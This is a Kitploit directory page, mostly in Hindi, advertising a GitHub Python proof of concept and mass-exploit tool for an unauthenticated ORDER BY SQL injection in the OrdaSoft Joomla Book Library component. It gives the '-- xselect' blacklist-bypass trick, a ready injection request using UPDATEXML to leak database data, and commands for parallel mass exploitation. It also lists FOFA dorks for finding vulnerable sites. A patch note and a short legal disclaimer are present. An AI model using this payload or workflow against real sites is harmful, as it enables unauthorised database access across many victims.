Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-101110 — Python 3 PoC और CVE-2026-101110 के लिए सामूहिक एक्सप्लॉइट, जो OrdaSoft Joomla Book Library <=6.4.6 में field/direction पैरामीटर के माध्यम से एक अनधिकृत ORDER BY SQL इंजेक्शन है। | Kitploit
उपकरण/GitHubGitHub/murrez/cve-2026-101110
टोहीभेद्यता स्कैनरभेद्यता विश्लेषणशोषणस्क्रिप्टिंग और स्वचालनवेब एप्लिकेशन शोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubmurrez/cve-2026-101110

CVE-2026-101110

Python 3 PoC और CVE-2026-101110 के लिए सामूहिक एक्सप्लॉइट, जो OrdaSoft Joomla Book Library <=6.4.6 में field/direction पैरामीटर के माध्यम से एक अनधिकृत ORDER BY SQL इंजेक्शन है।

4 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

CVE-2026-101110 — OrdaSoft Book Library (Free) अनधिकृत SQL इंजेक्शन

CVE-2026-101110 के लिए Python 3 PoC — Joomla ≤ 6.4.6 के लिए OrdaSoft Book Library (Free)। 6.4.7+ पर अपग्रेड करें।

PoCbithttps://pocbit.org/pocs/cve-2026-101110
Cataloghttps://pocbit.org/pocs/
Componentcom_booklibrary
File / functionsite/booklibrary.php → books()
Parametersfield, direction (sort)
AuthNone (public book listings)
CWECWE-89 SQL Injection
CVSS 4.09.3 Critical (Joomla CNA)
CreditAla Arfaoui

भेद्यता सारांश (Türkçe)

Book Library (Free), Joomla में पुस्तक पुस्तकालय / श्रेणी सूचियाँ प्रस्तुत करने वाला OrdaSoft प्लगइन है। 6.4.6 और पूर्व संस्करणों में, books() फ़ंक्शन field और direction पैरामीटर को protectInjectionWithoutQuote() से फ़िल्टर करता है। यह फ़ंक्शन केवल select उपस्ट्रिंग को खोजने वाली कमज़ोर ब्लैकलिस्ट लागू करता है; मिलने पर मान को $db->quote() से लपेट देता है, अस्वीकार नहीं करता।

मान बाद में बिना उद्धरण के ORDER BY अभिव्यक्ति में जोड़े जाते हैं — यहाँ उद्धरण का उपयोग SQL इंजेक्शन को नहीं रोकता (CNA विवरण)।

शोषण के लिए दो शर्तें:

  1. सत्र प्राइमिंग: पहला अनुरोध सत्र में संग्रहीत डिफ़ॉल्ट सॉर्टिंग (field / direction) मान लिखता है।
  2. ब्लैकलिस्ट बायपास: दूसरे अनुरोध में, पेलोड के अंत में -- xselect डिकॉय टिप्पणी जोड़ी जाती है; यह ब्लैकलिस्ट जाँच को पार कर जाती है, SQL टिप्पणी शेष पेलोड को प्रभावित नहीं करती।

परिणाम: बिना प्रमाणीकरण के ORDER BY SQLi, डेटाबेस पढ़ना/लिखना और साइट अखंडता के लिए गंभीर जोखिम।


तकनीकी तंत्र

Request 1 (prime):  ...&field=title&direction=ASC   → session sort defaults
Request 2 (inject): ...&field=<expr> -- xselect&direction=ASC
                      └─ concatenated into ORDER BY (unquoted)

कमज़ोर फ़िल्टर (अवधारणात्मक):

  • इनपुट में select (उपस्ट्रिंग) है → पूरे मान को उद्धरणों में लपेटें (ORDER BY संदर्भ में अप्रासंगिक)।
  • हमलावर -- xselect जोड़ता है ताकि ब्लैकलिस्ट टिप्पणी टेल के भीतर select देखे जबकि -- से पहले की सक्रिय अभिव्यक्ति निष्पादन योग्य SQL बनी रहे (error-based / UPDATEXML / stacked ORDER BY तरकीबें)।

PoC लागू करता है:

StepAction
Fingerprintcom_booklibrary paths + optional manifest version
Route discoveryshowCategory, search, showBooks, books, … + scraped catid / Itemid
checkPrime session → confirm SQLi (flag / VERSION())
exploitPrime → --subquery extract (default SELECT VERSION())
mass--list + -j parallel targets; exploited.txt on successful leak

कोड में पेलोड सफ़िक्स स्थिरांक: -- xselect (BLACKLIST_DECOY)।


आवश्यकताएँ

cd CVE-2026-101110
pip install -r requirements.txt

उपयोग

एकल लक्ष्य

python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive
python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"

मास बल्क (exploit-first वर्कफ़्लो)

python poc.py --list targets.example.txt --mode check -j 40 --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 12 --subquery "SELECT VERSION()" --exploited-list exploited.txt
FlagMeaning
--aggressiveCheck mode attempts version leak after prime
--subqueryInner expression for UPDATEXML / double-query payloads
--exploited-listTab-separated successful extracts
--no-colorDisable ANSI (also NO_COLOR)

JSONL: pocbit, pocbit_catalog, pocbit_page, cve, component, session_primed.


उदाहरण HTTP

प्राइम (सत्र):

GET /index.php?option=com_booklibrary&task=showCategory&catid=1&field=title&direction=ASC HTTP/1.1

इंजेक्ट (PoC डिकॉय जोड़ता है):

GET /index.php?option=com_booklibrary&task=showCategory&catid=1&field=UPDATEXML(1,CONCAT(0x7e,(VERSION()),0x7e),1) -- xselect&direction=ASC HTTP/1.1

GET विफल होने पर उसी रूट पर POST वेरिएंट का प्रयास किया जाता है।


संस्करण पहचान

मैनिफ़ेस्ट (यदि उजागर हो):

  • /administrator/components/com_booklibrary/booklibrary.xml

≤ 6.4.6 → भेद्य पंक्ति; ≥ 6.4.7 → पैच किया गया (patched_version in check output)।


FOFA dorks

body="option=com_booklibrary"
body="/components/com_booklibrary/" && body="Joomla"
body="com_booklibrary" && (body="booklibrary" || body="Book Library")
body="ordasoft" && body="booklibrary"

संबंधित OrdaSoft CVE (Sep 2026)

CVEExtensionIssueFixed
CVE-2026-101110Book LibraryORDER BY SQLi + blacklist bypass6.4.7
CVE-2026-101111Book LibraryReflected XSS (title param)6.4.7
CVE-2026-101108Vehicle ManagerORDER BY SQLi6.5.8
CVE-2026-100752Real Estate ManagerORDER BY SQLi6.7.9

आपके द्वारा तैनात सभी OrdaSoft कंपोनेंट को पैच करें।


संदर्भ

  • PoCbit CVE-2026-101110
  • CVE.report CVE-2026-101110
  • OrdaSoft
  • Historical: older com_booklibrary SQLi in search/lend tasks (CVE-2010-1522) — different code paths

कानूनी

केवल अधिकृत परीक्षण और पैच सत्यापन।


GitHub रिपॉज़िटरी विवरण

CVE-2026-101110 PoC: OrdaSoft Joomla Book Library (Free) <=6.4.6 unauth SQLi — field/direction ORDER BY, session prime + `-- xselect` blacklist bypass (com_booklibrary). Colored check + mass exploit, CVSS 9.3. https://pocbit.org/pocs/cve-2026-101110
टूल डाउनलोड करें